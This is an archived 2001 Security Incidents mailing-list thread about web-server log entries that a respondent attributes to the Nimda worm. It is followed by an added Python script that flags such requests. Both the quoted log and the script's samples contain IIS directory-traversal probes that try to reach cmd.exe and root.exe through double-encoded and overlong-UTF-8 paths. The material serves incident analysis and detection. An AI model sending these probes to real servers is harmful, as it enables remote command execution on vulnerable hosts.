Security Incidents mailing list archives

Re: code red request, but can't be resolved?


From: Mike Shaw <mshaw () wwisp com>
Date: Thu, 25 Oct 2001 16:26:40 -0500

It has a reverse lookup (64.148.216.72) but no forward lookup. That IP block is indeed owned by Internetconnect.

Looks like simple Nimdaness to me.

-Mike

At 04:08 PM 10/25/2001 -0500, Emre Yildirim wrote:
Hi,

I just got this.  Is it just me, or is this address spoofed?
Can anyone resolve dsl-6414821672.internetconnect.net?

dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:49 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"
dsl-6414821672.internetconnect.net - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"



--
Emre Yildirim <emre () asper org>
GPG KeyID 0xF9E4A1D1 (keyserver.pgp.com)


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
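
A log triage sketch for the requests quoted in the message above, added here as an example and not part of the original thread. It labels each request by what makes it suspicious (double percent-encoding, 0xC0/0xC1 bytes, traversal, a request for cmd.exe or root.exe); the function names and the two benign sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# host ident user [time] "METHOD path proto" status ...
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} ')

def classify(path):
    """Return the reasons a request path looks like one of the quoted probes."""
    raw, rounds, reasons = path.encode("latin-1", "replace"), 0, set()
    while rounds < 3:                      # decode repeatedly: %255c -> %5c -> backslash
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw, rounds = decoded, rounds + 1
    if rounds > 1:                         # one round is ordinary URL encoding
        reasons.add("double-encoding")
    if b"\xc0" in raw or b"\xc1" in raw:   # 0xC0/0xC1 never occur in valid UTF-8
        reasons.add("overlong-utf8")
    norm = raw.replace(b"\\", b"/").lower()
    if b"../" in norm:
        reasons.add("traversal")
    if re.search(rb"/(cmd|root)\.exe(\?|$)", norm):
        reasons.add("shell-binary")
    return reasons

def scan(lines):
    """Map client host -> [(path, sorted reasons)] for every flagged request."""
    hits = {}
    for line in lines:
        m = REQ.match(line)
        if m and (reasons := classify(m.group(2))):
            hits.setdefault(m.group(1), []).append((m.group(2), sorted(reasons)))
    return hits

H = "dsl-6414821672.internetconnect.net"   # client name from the quoted log
SAMPLE = [  # first three requests come from the thread; the last two are constructed
    H + ' - - [26/Oct/2001:00:13:47 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 279 "-" "-"',
    H + ' - - [26/Oct/2001:00:13:49 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"',
    H + ' - - [26/Oct/2001:00:13:50 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 279 "-" "-"',
    'client.example.net - - [26/Oct/2001:00:14:02 -0500] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
    'client.example.net - - [26/Oct/2001:00:14:05 -0500] "GET /docs/my%20file.html HTTP/1.0" 200 2048 "-" "-"',
]

if __name__ == "__main__":
    for host, found in scan(SAMPLE).items():
        for path, reasons in found:
            print(host, path, reasons)
```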


